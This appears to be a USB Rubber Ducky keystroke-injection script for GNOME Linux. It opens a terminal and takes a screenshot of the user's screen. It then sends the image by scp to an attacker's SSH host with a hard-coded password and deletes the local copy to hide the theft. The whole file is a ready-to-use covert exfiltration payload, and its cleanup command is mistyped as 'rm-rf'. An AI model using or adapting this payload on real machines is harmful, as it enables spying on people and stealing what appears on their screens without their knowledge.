DELAY 1000
ALT F2
DELAY 100
STRING gnome-terminal
DELAY 200
ENTER
DELAY 300
STRING gnome-screenshot
DELAY 200
ENTER
DELAY 200
STRING mv ~/Pictures/Screenshot*.png ~/
DELAY 200
ENTER
DELAY 500
STRING scp $HOME/Screenshot*.png [ssh address]
DELAY 500
ENTER
DELAY 500
STRING [password]
DELAY 500
ENTER
DELAY 200
STRING rm-rf Screenshot*.png
ENTER
DELAY 200
STRING exit
DELAY 200
ENTER

REM example: root@192.168.1.100:~/

REM ---to delay screen shot by x seconds change line 8 with----
REM ---STRING gnome-screenshot -d 10--------
